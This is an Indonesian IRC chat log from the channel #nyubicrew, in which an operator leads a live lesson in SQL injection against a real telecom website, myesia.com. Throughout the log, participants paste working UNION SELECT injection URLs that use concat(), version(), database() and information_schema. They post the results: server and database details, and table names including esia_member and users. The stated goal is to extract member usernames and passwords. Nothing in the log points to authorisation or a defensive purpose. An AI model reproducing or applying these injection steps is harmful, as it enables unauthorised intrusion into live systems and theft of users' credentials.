<+[^]YAMAHA[^]> :D
* +NoGe ([email protected]) Quit (Ping timeout)
* +anti_polda ([email protected]) Quit (Ping timeout)
<&home_edition2001> 1 gw ganti now() < buat liat time di server
<&home_edition2001> 3 gw ganti database() << utk liat nama database target
<&home_edition2001> 7 dan 8 sama
<&home_edition2001> wakaka
<&home_edition2001> apa yang lo liat
<&home_edition2001> dari hasil nya
* +[^]YAMAHA[^] kelen semua
* anti_polda ([email protected]) has joined #nyubicrew
* +[^]YAMAHA[^] kelen semua
<+hantu_manis> ada yg tau gprs gratizzzzzzzz <<<<--- jawap plizzzzz
<+hantu_manis> ada yg tau gprs gratizzzzzzzz <<<<--- jawap plizzzzz
<+ayunk> ?
<+Bukan-Diriku> 2007-10-11 20:10:41
<+Bukan-Diriku> myesiacom_webv2
<+Bukan-Diriku> [Download Document : [email protected]]
<+Bukan-Diriku> Last Update [email protected]
<&home_edition2001> gimana ngerti semua
<&home_edition2001> wew
<&home_edition2001> angka2 tadi berubahkan sesuai yang kita inginkan
<+Bukan-Diriku> hmmmm
* live sets mode: +v anti_polda
* +setiawan ([email protected]) Quit (Quit: MCM Internet Cafe Jl.Ruko Serayu No.7 Tegal)
<+Bukan-Diriku> mulai ngerti gw
<&home_edition2001> coba 8 lo ganti version()
<+Bukan-Diriku> :D
<+anti_polda> gw masih belum bro
<&home_edition2001> wakak
<+anti_polda> :(
<&home_edition2001> dimana gak ngertinya say
<&home_edition2001> nah server itu enak
* da_jackass ([email protected]) has joined #nyubicrew
<&home_edition2001> banyak yang bisa buat nampilin query
<+chawanua> sulit klo ga ada dasar ...
<&home_edition2001> nah klo cuman 1 doank gimana
<&home_edition2001> waka
<+anti_polda> tadi lo bilang lo biasanya pakai version
<&home_edition2001> nar juga paham
<&home_edition2001> wew
<+anti_polda> maksudnya
<&home_edition2001> version dll buat cek doank bisa jalan gak injeksi kita
<&home_edition2001> itu doank ko
* The_Corrs ([email protected]) has joined #nyubicrew
<&home_edition2001> kita blom ke tujuan utama lo mengeluarkan username ama pass
<&home_edition2001> tujuan akhirkan itu
<&home_edition2001> wakaka
* live sets mode: +v da_jackass
<+Bukan-Diriku> jd
<+haLah> terus gimana ngeluarinnya
<+haLah> wixixiixixix
<&home_edition2001> wew
<&home_edition2001> sabar kita belajar di luar dolo la
<&home_edition2001> xixi
* live sets mode: +v The_Corrs
<&home_edition2001> gimana dengan 1 tampilan kita bisa mengeluarkan perintah sekaligus
<&home_edition2001> jawabannya dengan concat
* +haLah nyimak
<@live> MILDnet Info : INFO MILDnet Network Staff doesnt responsible for anything you done in this networks as long as not disturb staff, networks and other user, so please behave your self :)
<&home_edition2001> concat(version(),-,now(),-,database(),-,user())
<&home_edition2001> tu caranya
<&home_edition2001> jadi bisa di susun seperti ini
* root_byte ([email protected]) has joined #nyubicrew
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,concat(version(),-,now(),-,database(),-,user()),2,3,4,5,6,7,8,9,10,11--
<&home_edition2001> nah ngerti ga
<&home_edition2001> jadi angka satu kita ganti concat(version(),-,now(),-,database(),-,user())
<+CYBER_GHOST> Not Found
<+CYBER_GHOST> The requested URL /fileup/[email protected] was not found on this server.
<+CYBER_GHOST> Apache Server at www.myesia.com Port 80
<+CYBER_GHOST> kok ga bisa?
* live sets mode: +v root_byte
<&home_edition2001> bias pake ip indonesia la
<+haLah> sama
<+Bukan-Diriku> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<&home_edition2001> Bukan-Diriku bisa
<&home_edition2001> knapa gak
<&home_edition2001> isa
<&home_edition2001> wakaka
<&home_edition2001> karena kita harus conver tanda - ke hexa
<+CYBER_GHOST> hahahaha
<&home_edition2001> biar bisa di mengerti sql
<&home_edition2001> - hexanya apa ya
<+CYBER_GHOST> ouhg.... hexa?
<&home_edition2001> wait
<+CYBER_GHOST> occay
<&home_edition2001> - << inikan ascii
<&home_edition2001> http://www.piclist.com/techref/ascii.htm << ni tempatnya
<&home_edition2001> buat conversi
<+da_jackass> ?
<&home_edition2001> 2D << ni hexanyua
<&home_edition2001> - = 2D
<&home_edition2001> ngerti
* +anti_polda ([email protected]) Quit (Ping timeout)
* +demittegal ([email protected]) Quit (Connection reset by peer)
<&home_edition2001> ngertikan sampe sini
<&home_edition2001> jadi bisa kita susun
* LamerCrew ([email protected]) has joined #nyubicrew
* Help sets mode: +o LamerCrew
<&home_edition2001> jadi angka satu kita ganti concat(version(),0x2D,now(),0x2D,database(),0x2D,user())
<&home_edition2001> gak tau juga gw knapa musti ditambah 0x
* anti_polda ([email protected]) has joined #nyubicrew
<&home_edition2001> coba dimasukin deh
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,concat(version(),0x2D,now(),0x2D,database(),0x2D,user()),2,3,4,5,6,7,8,9,10,11--
<+Bukan-Diriku> 0x <-- dasar assembly... kekekekeke
<+Bukan-Diriku> mpozzzz dah neh pala
<+haLah> 5.0.30-Debian_1-log-2007-10-11 20:20:[email protected]
<+haLah>
<&home_edition2001> wew
<+haLah> ica
<+haLah> xiixixix
<&home_edition2001> mantab kan
<&home_edition2001> xixi
<&home_edition2001> mantabb
<+da_jackass> 5.0.30-Debian_1-log-2007-10-11 20:21:[email protected]
<+da_jackass> 3
<+da_jackass> [Download Document : 7]
<&home_edition2001> duh gw kebelet boker dolo ya anak2
<&home_edition2001> wakaka
* live sets mode: +v anti_polda
<+da_jackass> jah dia boker
<+Bukan-Diriku> zzzzzzzzzzzzzzzzzzz
<+haLah> jis
<+da_jackass> wkakwak
<+haLah> wakkakawkwakawkaw
* +abulhaul ([email protected]) Quit (Ping timeout)
<@live> MILDnet Info : INFO MILDnet Network Staff doesnt responsible for anything you done in this networks as long as not disturb staff, networks and other user, so please behave your self :)
<@LamerCrew> ew
* +da_jackass ([email protected]) has left #nyubicrew
* NoGe ([email protected]) has joined #nyubicrew
* Help sets mode: +h NoGe
<%NoGe> nah
* &home_edition2001 back
<+anti_polda> 0x2D,now(),0x2D,database(),0x2D,user())<-----gk ngerti
<&home_edition2001> duh lega
* demittegal ([email protected]) has joined #nyubicrew
<%NoGe> bius dah selese boker?
<+anti_polda> 0x2D,now(),0x2D,database(),0x2D,user())<-----gk ngerti
<&home_edition2001> wakakaka
<+anti_polda> tolong di ulang DC mulu nih
<+haLah> pa lagi gw
<+haLah> :((
<&home_edition2001> 0x2D = -
<+CYBER_GHOST> Not Found
<+CYBER_GHOST> The requested URL /fileup/7 was not found on this server.
<+CYBER_GHOST> Apache Server at www.myesia.com Port 80
<+CYBER_GHOST> hiks...
<%NoGe> anti_polda http://www.reversing.org/node/view/13
<+[^]YAMAHA[^]> gak siap2 si home_edition2001 boker
<&home_edition2001> CYBER_GHOST pake ip indonesia
<+CYBER_GHOST> tetep g bisa di dunlut
* live sets mode: +v NoGe
<%NoGe> bius lanjut
<&home_edition2001> ok
<&home_edition2001> xixix
<&home_edition2001> sep
<+Bukan-Diriku> knapa musti pakek tanda "-"
<+Ibenk_19_Hoki> biar keren kale
<+Ibenk_19_Hoki> -.-"
<+Bukan-Diriku> kekekekkee
<+Ibenk_19_Hoki> jiakakka
<&home_edition2001> biar ada tanda jeda
* live sets mode: +v demittegal
<%NoGe> karena tanda - membuat si sql server erorr
<&home_edition2001> ntar lo bingung
<+Ibenk_19_Hoki> owh...
<&home_edition2001> antara hasil 1 sama hasil 2
<+arioo> kwekwekwekwe
<&home_edition2001> wakaka
<+arioo> om homo jadi guru
<+arioo> xixixix
<&home_edition2001> gak lah NoGe
<+arioo> mantebb
<+arioo> xixixix
<%NoGe> kwakwka
<%NoGe> next pliss
<+haLah> lanjot lah pak
<&home_edition2001> <%NoGe> karena tanda - membuat si sql server erorr << tanda pisah aja dari pada spasi lebih jelas tanda - or bisa di ganti / : dll
<&home_edition2001> asal di converd dolo ke hesa
<%NoGe> arioo mwah mwah dolo lakh
<&home_edition2001> asal di converd dolo ke hexa
<&home_edition2001> ok
<+Bukan-Diriku> seep
<&home_edition2001> itu tadi versi berapa
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11-- << balik kesini lagi
<&home_edition2001> tadi versi berapa sql servernya
<&home_edition2001> kacang2
<&home_edition2001> kacang2
<&home_edition2001> tadi versi berapa sql servernya
<&home_edition2001> tadi versi berapa sql servernya
<&home_edition2001> kacang2
<&home_edition2001> kacang2
<&home_edition2001> kacang2
<%NoGe> hue
<+haLah> 5.0.30-Debian_1-log-2007-10-11 20:20:[email protected]
<+haLah>
<&home_edition2001> versi 5 ya
<%NoGe> versi ne mana
<&home_edition2001> buka lagi kamusnya
<&home_edition2001> 5.0.30-Debian_1-log << versi
<%NoGe> nah
<&home_edition2001> http://www.reversing.org/node/view/13 << ni kamus kita
<+anti_polda> 5.0.30-Debian_1-log-2007-10-11
<&home_edition2001> wajaja
<&home_edition2001> wakaka
<&home_edition2001> 2007-10-11 << ini date dodol
<&home_edition2001> waa
<%NoGe> ok2
<&home_edition2001> gimana gak pake tanda -
<&home_edition2001> wakaka
<+anti_polda> iya 5.0.30-Debian ni versinya...
<+anti_polda> trus...
<&home_edition2001> liat ini
<&home_edition2001> ----------------------------potong---------------------
<&home_edition2001> Mysql version cares
<&home_edition2001> Diferent Mysql versions will have diferent features. Where there's no way in MySQL to know the databases structure other than using SHOW in mysql 3 and 4, in Mysql 5.x there's a new table, INFORMATION_SCHEMA, holding everything about databases, tables, columns and so. Some recursive selects requests to this table will give all the information about the database.
<&home_edition2001> http://dev.mysql.com/doc/refman/4.1/en/
<&home_edition2001> http://dev.mysql.com/doc/refman/5.0/en/
<&home_edition2001> So, it's not only that diferent functions will be available, also diferent tables are version dependant. It's important then to notice that version of exploited MySQL is the first task to guess no matter how. MySQL 3 doesn't support UNION sentences, MySQL5 incorporates the INFORMATION_SCHEMA table.. Not every operation can be executed in every MySQL version.
<&home_edition2001> ------------------------end--------------------------------------
<&home_edition2001> tu celah versi 5
<+Ibenk_19_Hoki> ------------------------------
<+Ibenk_19_Hoki> ------------------------------
<&home_edition2001> INFORMATION_SCHEMA << ada fasilitas ini
<+Ibenk_19_Hoki> makan lontong
<+Ibenk_19_Hoki> ----------------
<&home_edition2001> wakaka
<&home_edition2001> Ibenk_19_Hoki wakaka
<&home_edition2001> oke
<&home_edition2001> kita susun ya
<%NoGe> yuu
<&home_edition2001> skarang latihan membuka tabel
<&home_edition2001> skarang latihan membuka tabel
<&home_edition2001> skarang latihan membuka tabel
<&home_edition2001> skarang latihan membuka tabel
<&home_edition2001> skarang latihan membuka tabel
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11-- << kembali ke tanktop
<&home_edition2001> wakaka
* Jee ([email protected]) has joined #nyubicrew
<&home_edition2001> nah INFORMATION_SCHEMA << inikan berupa tabel defaultkan bawaan dari si sql
<&home_edition2001> cara liatnya gini
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11 from INFORMATION_SCHEMA-- << neh
<&home_edition2001> coba
<%NoGe> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<+Bukan-Diriku> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
* live sets mode: +v Jee
<&home_edition2001> Bukan-Diriku salah tu
<&home_edition2001> harusnya gak eroor
<&home_edition2001> gw gak erorr
<@live> MILDnet Info : DONATE Support MILDnet Network by donate your e-gold account to http://4222642.e-gold.com/ we appreciate all donation that you make, thank you
<%NoGe> wew
<+Ibenk_19_Hoki> siapa yg udah lebaran nich...
<%NoGe> gw juga error
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11
* +dayak ([email protected]) Quit (Ping timeout)
<+Ibenk_19_Hoki> jah.. ok ok.. lanjutin kalo masih ngebahas ituan.. !!
<&home_edition2001> wakaka
<&home_edition2001> dodol la gw
<&home_edition2001> gw yang dodol sory
<%NoGe> :)
<+Ibenk_19_Hoki> gw laporin ama esia ntar
<+Ibenk_19_Hoki> xixixiix
<+arioo> Ibenk_19_Hoki <-- staff esia neh kwekwekwek
<+Ibenk_19_Hoki> jikakakakkaka
<+katro> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<+anti_polda> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177 <---gw gini juga bius
<%NoGe> arioo mwah mwah dolo lah
<+Bukan-Diriku> bRb bakar rokok lagee
<+Bukan-Diriku> wiuuuuuuuuuuuuuuuuuuuuuu........... suara takbir jekkkkkkkkkkkkkk bikin merinding gwv :(
* +The_Corrs ([email protected]) Quit (Ping timeout)
<+arioo> wiuuuuuuuuuuuuuuuuuuuuuu........... suara takbir jekkkkkkkkkkkkkk bikin merinding gwv :( <-- tanda banyak dosa
<+arioo> jiwakawkawkawkwaaw
<+arioo> jiwakawkawkawkwaaw
* +arioo kabooor
<+arioo> xixixix
<&home_edition2001> wakaka
<&home_edition2001> kurang
<+Bukan-Diriku> asuuuuuuuuuuuuuuu
<+Bukan-Diriku> sene kow arioo.... tak sodomi kowww
<&home_edition2001> nah INFORMATION_SCHEMA.tables << untuk cari tabel
<&home_edition2001> nah INFORMATION_SCHEMA.column << untuk cari colom
<+SaPi`KeReN> bRb bakar rokok lagee <=- yang yang bisa bangun aja. supaya tahan lama. Kadang besar kadang kecil
<&home_edition2001> skarang kita cari tabelnya ya
<+arioo> !Dns
<+SaPi`KeReN> seep
* +SaPi`KeReN sambil liatin aja
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables-- << wew
<&home_edition2001> good
<&home_edition2001> sep
<&home_edition2001> skarang cari tabel ya
<%NoGe> 1
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> iks
<&home_edition2001> sep
<+katro> 1
<+katro> 3
<+katro> [Download Document : 7]
<+katro> Last Update 8
<+katro> back
<&home_edition2001> angka satu kita keluarkan tabelnya
<%NoGe> yuu
<&home_edition2001> ganti 1 dengan tables_name
* +anti_polda ([email protected]) Quit (Ping timeout)
<&home_edition2001> ganti 1 dengan table_name
* anti_polda ([email protected]) has joined #nyubicrew
<+Ibenk_19_Hoki> Rui Jorge Ribeiro da Costa says: It's ok.. I will order 10 piece from you with total $3500
<+Ibenk_19_Hoki> jiakakaka
<+Ibenk_19_Hoki> gw tipuin rui costa
<+Ibenk_19_Hoki> pemain bola kan byk duit nya
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,tables name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--
<+Bukan-Diriku> esia_user <-- aw aw aw
<+Bukan-Diriku> esia_user <-- aw aw aw
<+Bukan-Diriku> esia_user <-- aw aw aw
<+Bukan-Diriku> esia_user <-- aw aw aw
* dream_of_confutions ([email protected]_of_confutions.users.mildnet.org) has joined #nyubicrew
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--
<&home_edition2001> wakaka
* anakbugis ([email protected]) has joined #nyubicrew
<&home_edition2001> keluar semu akan
<&home_edition2001> keluar semua kan
<&home_edition2001> xixi
* dayak ([email protected]) has joined #nyubicrew
* +Brew0ks ([email protected]) Quit (Ping timeout)
* live sets mode: +v anti_polda
<&home_edition2001> gak sia2 injek2 dari tadi
<%NoGe> esia_other_cat
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> esia_prabayar
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> esia_search
<%NoGe> hehehe
<%NoGe> kliatan iks
<+katro> users
<+katro> 3
<+katro> [Download Document : 7]
<+katro> he he he
* live sets mode: +v dream_of_confutions
<&home_edition2001> mantab si katro
<&home_edition2001> langsung kepusat saraf
* live sets mode: +v anakbugis
<@LamerCrew> bahhhh
<+CYBER_GHOST> hiks...
<@LamerCrew> si ratu HOMO ada disini -_-'
<+Ibenk_19_Hoki> udah hari royo ora iki yoo
* +CYBER_GHOST dodol banget
<%NoGe> hahaha
* The_Corrs ([email protected]om) has joined #nyubicrew
* Help sets mode: +h anakbugis
<+Ibenk_19_Hoki> bingung gw
<+arioo> wkekwekweew
<+katro> cara ngeluarin isi table user nya ?
<+arioo> :D
<+CYBER_GHOST> blas ra ngerti euy...
<+CYBER_GHOST> T_T
<+arioo> :D
<&home_edition2001> nah itukankan gak tau tabel dari mana asalnya
<+arioo> kwekwekwe
<&home_edition2001> kita sortir yu
<+katro> yup
<+Ibenk_19_Hoki> yukk yukk
<+anti_polda> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<+katro> home_edition2001 : tar dibikin txt nya yak
* live sets mode: +v dayak
<+anti_polda> kok sama aja keluarannya sama sebelumnya
<+katro> wekekeekekekeke
<&home_edition2001> kita mau keluarin tabel yang ada di database dia aja selain itu kita gak keluarkan
<&home_edition2001> setubuh ga
<&home_edition2001> wew
<&home_edition2001> gw gak lok mircnya
<&home_edition2001> mungkin temen2 ada yang ngelog
<+arioo> setubuuuhhh
* +dayak ([email protected]) Quit (Ping timeout)
<+katro> gue log
<+arioo> tapi setubuh nya ama cewek
<+katro> tar gue bikin
<+arioo> kwekwkwe
<+arioo> :D
<+arioo> klo ama oms homo kagak mao gue
<+arioo> -,-`
<+katro> lu nanti koreksi dah home_edition2001
<%NoGe> bius lanjut
* live sets mode: +v The_Corrs
<+arioo> pakek ip asli aza uit
<+arioo> rame rame
<+arioo> kwekwewe
<+SaPi`KeReN> trus boss
<+arioo> biar binung admin na
<+arioo> kewkeqkqekqeqe
<+arioo> :D
* arioo was kicked by Help (Stop flooding!)
<+anti_polda> bius...
* arioo ([email protected]) has joined #nyubicrew
<+Ibenk_19_Hoki> koaekoakwekoaew
<@live> arioo <- gak pernah mandi
<+anti_polda> sloki itu usernya???
<+katro> yok lanjut2
peler neh help
<+Ibenk_19_Hoki> jiakakkaka
-,-`
<+anti_polda> sloki itu usernya???
<&home_edition2001> where%20table_schema=database()%20limit%200,1/* << ini buat sortirnya ngerti kan klo ini
<+anti_polda> sloki itu usernya???
<&home_edition2001> anti_polda iya tau
* +NenneN pamid dolo (mau saur)
<@live> MILDnet Info : FORUM Visit our official FORUM at http://mildnet.net
<+katro> from nya diganti kan ?
<+NenneN> buaibaiii semua
<&home_edition2001> dilanjut
<%NoGe> bius kurang ngerti
* +NenneN ([email protected]) has left #nyubicrew
<+Ibenk_19_Hoki> NenneN pamid dolo (mau saur) <<-- belum lebaran boss ??
* live sets mode: +v arioo
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20where%20table_schema=database()%20limit%200,1/*
<+katro> ?
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tableswhere%20table_schema=database()%20limit%200,1/*-- << wew
<&home_edition2001> bukan disitu
<+arioo> yang kagak ngerti silakan baca dari atas tuh asli di jelasin mendetail ama oms homo
<+arioo> kwekwkewe
<+arioo> :D
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables where%20table_schema=database()%20limit%200,1/*-- << wew
<&home_edition2001> sial la arioo
<%NoGe> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<&home_edition2001> sapa yang log dari pertama biar di upload
<+arioo> xixixixix
<+arioo> :D
<&home_edition2001> kasian yang lom tau
<+katro> gue log dari awal udah dilanjut dulu
<+arioo> kwekwekwe
<+katro> sampe kelar
<+Ibenk_19_Hoki> jiakakkakakaka
<+haLah> lanjud
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables where%20table_schema=database()%20limit%200,1-- << ni yang bener
<+arioo> tuh si Ibenk_19_Hoki
<%NoGe> tu si katro ngelog
<+arioo> tuh log
<+arioo> xixixix
<+arioo> :D
<+Ibenk_19_Hoki> ulangin dunks tutor nya
<+Ibenk_19_Hoki> :D
<+Ibenk_19_Hoki> jiaikaka
<+Ibenk_19_Hoki> dari awal yah...
<+Ibenk_19_Hoki> :P~
<%NoGe> 1
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> back
<+arioo> ulangin dunks tutor nya
<+arioo> :D
<+arioo> jiaikaka
<+arioo> dari awal yah...
<+arioo> :P~
<+arioo> wwew mo buat oms homo naaek darah turun titid neh
* arioo was kicked by Help (Stop flooding!)
* arioo ([email protected]) has joined #nyubicrew
<@live> arioo <- Wong Sinting
-,-1
<%NoGe> wakwkakwakwkak
<+katro> 1
<&home_edition2001> table_namenya lupa tu
<+katro> 3
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1--
<+katro> [Download Document : 7]
<+katro> Last Update 8
<&home_edition2001> tu yang udah fix
<%NoGe> esia_ams_categories
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> back
<%NoGe> tuh
<&home_edition2001> <%NoGe> esia_ams_categories << tabel 1
<&home_edition2001> gimana untuk tabel ke 2 nya
<%NoGe> ya
* live sets mode: +v arioo
<%NoGe> satu2 ngeluarin ne
<+katro> esia_ams_categories
<+katro> 3
<+katro> [Download Document : 7]
<+katro> Last Update 8
<+katro> back
<&home_edition2001> iya NoGe
<&home_edition2001> iya NoGe
<&home_edition2001> iya NoGe
<%NoGe> ganti table_name
<%NoGe> ganti table_name
<&home_edition2001> 0,1-- << look at
<&home_edition2001> mainindisitu aja
<&home_edition2001> 0,1-- << tabel 1
<&home_edition2001> 1,1-- << tabel 2
* %NoGe inget ne .asp
<%NoGe> iks
<&home_edition2001> 2,1-- << tabel 3
<&home_edition2001> 3,1-- << tabel 4
<&home_edition2001> dst
<&home_edition2001> sampe abis
<&home_edition2001> wakaka
<&home_edition2001> mudah kan
<%NoGe> esia_ams_cs
<%NoGe> 3
<%NoGe> ya ya
<&home_edition2001> NoGe
<&home_edition2001> lo log kan semua nya dari awal
<+Ibenk_19_Hoki> ntar klo dah berhasil.. kasi tau yah..
<+Ibenk_19_Hoki> kekke
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20--
<&home_edition2001> gw males bikin tutor enakan live kaya gini
<%NoGe> iya
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20 0,1--
<+katro> itu yach
<+katro> yg dimaenin
<%NoGe> gw log say
<+katro> string ujungnya
<%NoGe> aw aw
<&home_edition2001> hasilnya ketauan kan
<&home_edition2001> xixi
<+Ibenk_19_Hoki> gw males bikin tutor enakan live kaya gini <<-- ajarin gw nyuri satelite broo !!
<&home_edition2001> cari gih tabel mana yang menarik
<+Ibenk_19_Hoki> live yah
<&home_edition2001> nyurisatelit mudah bro
<&home_edition2001> wakaka
<&home_edition2001> lo yang gwsuruh2 ya
<&home_edition2001> wakaka
<+Ibenk_19_Hoki> terbang lagi ?
<+katro> tadi users
<+katro> di tabel keberapa ya
<&home_edition2001> wew
<+Ibenk_19_Hoki> kekek
<&home_edition2001> coba gih
<&home_edition2001> gw lag ne
<+arioo> nyurisatelit mudah bro <-- mantabbb
<&home_edition2001> gw gak browsing ne
<&home_edition2001> pake khayalan aja
<+Ibenk_19_Hoki> owh..
<+Ibenk_19_Hoki> jeekeke
<+katro> bah
<%NoGe> esia_member
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> back
<%NoGe> kek ne menarik tu
<&home_edition2001> gw dah apal langkah2nya
<%NoGe> :p
<+Ibenk_19_Hoki> kalo nerbangin nuklir US gimana cara nya broo ?
<&home_edition2001> wew
<&home_edition2001> oke
<&home_edition2001> sep
<+katro> NoGe : sampe username
<+Ibenk_19_Hoki> kekeke
<&home_edition2001> kita bongkar member ya
<+Ibenk_19_Hoki> mau gilak ini gw
<&home_edition2001> setubuh
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20limit%206,1--
<%NoGe> tuh
<%NoGe> 6
<&home_edition2001> ok
<&home_edition2001> sep
<+katro> oh 6,1
<%NoGe> yuuu
<%NoGe> liad member ne
<+SaPi`KeReN> sep
<%NoGe> :p
<&home_edition2001> skarang pake information_schema.column
<+katro> esia_member
<+katro> 3
<+katro> [Download Document : 7]
<+katro> Last Update 8
<+katro> back
<&home_edition2001> INFORMATION_SCHEMA.columns << ni injek selanjutnya
<&home_edition2001> cemana nyusunnya
<+arioo> skarang pake information_schema.column <--- udah mulai ke pusat saraf neeh
<+arioo> kwekwekwe
<%NoGe> hehehe
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_schema=database()%20limit%206,1--
<&home_edition2001> wakaka
* +chawanua ([email protected]) Quit (Client exited on MILDNet)
<+katro> ?
<&home_edition2001> table_name diganti column_name
<%NoGe> ga bisa bius
<%NoGe> iya
<+Bukan-Diriku> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20INFORMATION_SCHEMA.tables%20where%20table_schema=database()%20limit%2016,1--
<+arioo> ,table_name,2
<+arioo> kwekwekwe
<&home_edition2001> information_schema.tables diganti information_schema.column
<+arioo> :D
<&home_edition2001> trus
<%NoGe> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<&home_edition2001> table_schema=database() diganti table_name=esia_member
<&home_edition2001> coba susun Bukan-Diriku
<&home_edition2001> NoGe
<&home_edition2001> gw liat udah bener lom
<&home_edition2001> logikannya
<+katro> beh error
<&home_edition2001> jangan langsung dolo la
<&home_edition2001> paste sini dolo
<&home_edition2001> biar pa guru priksa
<&home_edition2001> yang salah di tiom ya
<+arioo> weks -.-`
<+Ibenk_19_Hoki> pantad na
* +arioo kaboor aah entar di tiom pak guru
<+Ibenk_19_Hoki> kekeke
<@live> MILDnet Info : VHOST Need Vhost for your nick?? join #help for further detail
<&home_edition2001> yang bener di tusuk bokong nya
<+haLah> wakakkakakaka
<+arioo> wetew
<+Ibenk_19_Hoki> kekekek
<+arioo> tambah parah
<+arioo> -,-`
<&home_edition2001> yang gak ngumpulin homo
<+arioo> mendingan kagak jadih deh ulik ulik na
<+arioo> kqkqqekeqkeqkqekeqkqe
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_name=esia_member%20limit%206,1--
<+arioo> wetewww
<%NoGe> ?
<+arioo> serba salah
<+arioo> quit aah
<+arioo> kwkwekekeqkeq
<+Ibenk_19_Hoki> yg di bahas ini ngasilin duit ga sih ?
<+katro> error sloki melulu
<&home_edition2001> 6,1-- << balik kesemula donk om
* chawanua ([email protected]) has joined #nyubicrew
<&home_edition2001> jadi 0,1-- lagi
<+arioo> yg di bahas ini ngasilin duit ga sih ? <-- tergantung iman nya oms
<+arioo> kwekwekwe
<+arioo> :D
<&home_edition2001> knapa erorr
<&home_edition2001> xix
<+Ibenk_19_Hoki> arioo : kekekek
<+arioo> kwekkwekwe
<+arioo> :D
<+Ibenk_19_Hoki> seriuss amat
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_name=esia_member%20limit%206,1--
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_name=esia_member%20limit%200,1--
<%NoGe> :))
<+katro> nah si NoGe
<+arioo> kwewkwe
<+arioo> :D
<+anti_polda> &page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_name=esia_member()%20limit%200,1--
* %anakbugis ([email protected]) Quit (Quit from MILDNet: )
<&home_edition2001> NoGe isa keluar gak hasilnya
<+anti_polda> jadi gini maksudnya
